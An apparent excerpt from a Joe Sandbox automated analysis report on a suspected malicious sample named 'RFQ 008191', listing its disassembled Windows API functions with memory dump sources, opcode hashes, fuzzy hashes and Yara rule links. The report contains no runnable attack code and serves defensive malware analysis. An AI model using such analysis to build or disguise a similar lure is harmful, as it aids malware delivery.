                                                                    • Instruction Fuzzy Hash: 3AE0BFB4A10219BFFB10AB64ED05F7B77BCF704604F418825BD10F2551D774A9148A7C
                                                                    Function 00401598 Relevance: 3.0, APIs: 2, Instructions: 23COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1330290654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1330272699.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330318442.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330545906.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RFQ 008191.jbxd
                                                                    Similarity
                                                                    • API ID: ShowWindow
                                                                    • String ID:
                                                                    • API String ID: 1268545403-0
                                                                    • Opcode ID: cab2a2c0edfac892ff3ce5f7d86d0a7ecd7f2e6ddf1a0654be13e65ecb3d048e
                                                                    • Instruction ID: ad827bfb45cde9ed8aa1bf7c1acfcc20c377366860c5f8f00bfddef7402fec92
                                                                    • Opcode Fuzzy Hash: cab2a2c0edfac892ff3ce5f7d86d0a7ecd7f2e6ddf1a0654be13e65ecb3d048e
                                                                    • Instruction Fuzzy Hash: 52E04F72B11114ABCB18CBA8EDD086E73B6AB54310350453FD502B36A4CA759C418B58
                                                                    Function 00406935 Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetModuleHandleA.KERNEL32(?,00000020,?,0040362C,0000000C,?,?,?,?,?,?,?,?), ref: 00406947
                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00406962
                                                                      • Part of subcall function 004068C5: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068DC
                                                                      • Part of subcall function 004068C5: wsprintfW.USER32 ref: 00406917
                                                                      • Part of subcall function 004068C5: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 0040692B
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1330290654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1330272699.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330318442.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330545906.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RFQ 008191.jbxd
                                                                    Similarity
                                                                    • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                    • String ID:
                                                                    • API String ID: 2547128583-0
                                                                    • Opcode ID: 38b25401b771ecf209a524bd0999a173af8b0ad39984603ae0a2953bb283c85e
                                                                    • Instruction ID: 5f896a6f513cb693e05c26686958cbb9026995673407ad46a654cc37c4de4e39
                                                                    • Opcode Fuzzy Hash: 38b25401b771ecf209a524bd0999a173af8b0ad39984603ae0a2953bb283c85e
                                                                    • Instruction Fuzzy Hash: BCE0CD73604310EBD61067755D0493773E89F85B50302483EF947F2140D734DC32A7AA
                                                                    Function 00406031 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetFileAttributesW.KERNELBASE(00000003,004030E2,00437800,80000000,00000003), ref: 00406035
                                                                    • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406057
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1330290654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1330272699.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330318442.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330545906.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RFQ 008191.jbxd
                                                                    Similarity
                                                                    • API ID: File$AttributesCreate
                                                                    • String ID:
                                                                    • API String ID: 415043291-0
                                                                    • Opcode ID: 6be4d53c09d0ea7202590e2ef391dde9d68f005235e9a58d36352f422cb06a2c
                                                                    • Instruction ID: 9d50a09f5748d4f60ef03139cc16a9656d1073ae209d3065c053d14625e31d4c
                                                                    • Opcode Fuzzy Hash: 6be4d53c09d0ea7202590e2ef391dde9d68f005235e9a58d36352f422cb06a2c
                                                                    • Instruction Fuzzy Hash: 87D09E31654301AFEF098F20DE16F2EBAA2EB84B00F11552CB682941E0DA715819DB15
                                                                    Function 0040600C Relevance: 3.0, APIs: 2, Instructions: 13COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetFileAttributesW.KERNELBASE(?,?,00405C11,?,?,00000000,00405DE7,?,?,?,?), ref: 00406011
                                                                    • SetFileAttributesW.KERNEL32(?,00000000), ref: 00406025
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1330290654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1330272699.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330318442.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330545906.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RFQ 008191.jbxd
                                                                    Similarity
                                                                    • API ID: AttributesFile
                                                                    • String ID:
                                                                    • API String ID: 3188754299-0
                                                                    • Opcode ID: bc30e5c928ed30f9cb3e730bb3a024ff28878b527ec9bdb2640fa07c227b463d
                                                                    • Instruction ID: fbd6844141adfc982ff7d741096df028d7bbee698e850df9006aa2ae5f51d9dd
                                                                    • Opcode Fuzzy Hash: bc30e5c928ed30f9cb3e730bb3a024ff28878b527ec9bdb2640fa07c227b463d
                                                                    • Instruction Fuzzy Hash: 24D0C972504221AFC2103728EE0889BBF55DB542717028A35F8A9A22B0CB304C668694
                                                                    Function 00405AEF Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CreateDirectoryW.KERNELBASE(?,00000000,0040350F,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00403806,?,00000008,0000000A,0000000C), ref: 00405AF5
                                                                    • GetLastError.KERNEL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00405B03
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1330290654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1330272699.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330318442.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330545906.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RFQ 008191.jbxd
                                                                    Similarity
                                                                    • API ID: CreateDirectoryErrorLast
                                                                    • String ID:
                                                                    • API String ID: 1375471231-0
                                                                    • Opcode ID: 7ce514c051633c67dabed91c1ba2c830ad6f4192d7236d4c27a26ed09d9cb01d
                                                                    • Instruction ID: c3646108da72950d5b730f2af08982bf7448ccd78712563759f5c9f930c8cbe9
                                                                    • Opcode Fuzzy Hash: 7ce514c051633c67dabed91c1ba2c830ad6f4192d7236d4c27a26ed09d9cb01d
                                                                    • Instruction Fuzzy Hash: 11C04C70244906DAD6509B219F0C71779A0EB50781F195839A586E50A0DA34B455D92D
                                                                    Function 004063DC Relevance: 1.5, APIs: 1, Instructions: 24registryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402E7C,00000000,?,?), ref: 00406405
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1330290654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1330272699.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330318442.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330545906.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RFQ 008191.jbxd
                                                                    Similarity
                                                                    • API ID: Create
                                                                    • String ID:
                                                                    • API String ID: 2289755597-0
                                                                    • Opcode ID: b17b4e85cc10dff7c00d1995fa2300a068af545831f113dbcef6cd8b4d780b07
                                                                    • Instruction ID: 15c5175e75f921513b7f3d75ccef30e451623c4c54541e9d5ee9eac1385433f3
                                                                    • Opcode Fuzzy Hash: b17b4e85cc10dff7c00d1995fa2300a068af545831f113dbcef6cd8b4d780b07
                                                                    • Instruction Fuzzy Hash: 1DE0E6B2010109BFEF195F50DD0AD7B371DEB04310F01492EFE16D4051E6B5E9306674
                                                                    Function 004060E3 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,0040349F,00000000,00414EC0,?,00414EC0,?,000000FF,00000004,00000000), ref: 004060F7
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1330290654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1330272699.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330318442.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330545906.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RFQ 008191.jbxd
                                                                    Similarity
                                                                    • API ID: FileWrite
                                                                    • String ID:
                                                                    • API String ID: 3934441357-0
                                                                    • Opcode ID: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
                                                                    • Instruction ID: b9d802e93a63440494d75fc60edee4ff4d41d1542efeb3ab79d4fb436c6ecda5
                                                                    • Opcode Fuzzy Hash: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
                                                                    • Instruction Fuzzy Hash: 91E08C3220422AABEF109E909C04EEB3B6CEB003A0F014432FD26E6050D271E9319BA4
                                                                    Function 004060B4 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004034D1,00000000,00000000,00403328,000000FF,00000004,00000000,00000000,00000000), ref: 004060C8
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1330290654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1330272699.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330318442.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330545906.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RFQ 008191.jbxd
                                                                    Similarity
                                                                    • API ID: FileRead
                                                                    • String ID:
                                                                    • API String ID: 2738559852-0
                                                                    • Opcode ID: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
                                                                    • Instruction ID: 0a9ed9335d9fcbf33a9b7557f86da276afb46ac39f2db62fb679b5cfb923300a
                                                                    • Opcode Fuzzy Hash: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
                                                                    • Instruction Fuzzy Hash: C1E0BF32250269ABDF109E559C00AAB775CEB05251F014436B955E7150D671E92197A4
                                                                    Function 004015C8 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015D3
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1330290654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1330272699.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330318442.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330545906.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RFQ 008191.jbxd
                                                                    Similarity
                                                                    • API ID: AttributesFile
                                                                    • String ID:
                                                                    • API String ID: 3188754299-0
                                                                    • Opcode ID: 478cb40ad17b728b10cdbf16e79a2720acc2e44bc9a29048479925e3e1a41e6f
                                                                    • Instruction ID: f0c310d3f6fffa79c82dab7da22db7b00a6fee7441536bfeb36ed7c6a7bf75c0
                                                                    • Opcode Fuzzy Hash: 478cb40ad17b728b10cdbf16e79a2720acc2e44bc9a29048479925e3e1a41e6f
                                                                    • Instruction Fuzzy Hash: 94D05B72B08201DBDB00DBE89B48A9F77709B10368F30853BD111F11D4D6B9C945A71D
                                                                    Function 0040450C Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040451E
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1330290654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1330272699.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330318442.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330545906.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RFQ 008191.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend
                                                                    • String ID:
                                                                    • API String ID: 3850602802-0
                                                                    • Opcode ID: c543a5305144ba01004fe0d35289a86565b01ad173ebec7ef44f324a9b2ac024
                                                                    • Instruction ID: 43b4292f00af6435b8222dbb4ed8e84b3d95e84959177ba0714352b3dfcaa9b9
                                                                    • Opcode Fuzzy Hash: c543a5305144ba01004fe0d35289a86565b01ad173ebec7ef44f324a9b2ac024
                                                                    • Instruction Fuzzy Hash: 40C09BF17413017BDA209B509E45F1777989795701F15453D7350F50E0CBB4E450D61D
                                                                    Function 004034D4 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403267,?), ref: 004034E2
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1330290654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1330272699.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330318442.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330545906.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RFQ 008191.jbxd
                                                                    Similarity
                                                                    • API ID: FilePointer
                                                                    • String ID:
                                                                    • API String ID: 973152223-0
                                                                    • Opcode ID: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
                                                                    • Instruction ID: 1f5c7ae16c2334422adcad36111bde95194575cbdac9b1f52e29a9f6e91cc98e
                                                                    • Opcode Fuzzy Hash: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
                                                                    • Instruction Fuzzy Hash: 34B01271240300BFDA214F00DF09F057B21ABA0700F10C034B388380F086711035EB0D
                                                                    Function 004044F5 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SendMessageW.USER32(00000028,?,00000001,00404320), ref: 00404503
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1330290654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1330272699.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330318442.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
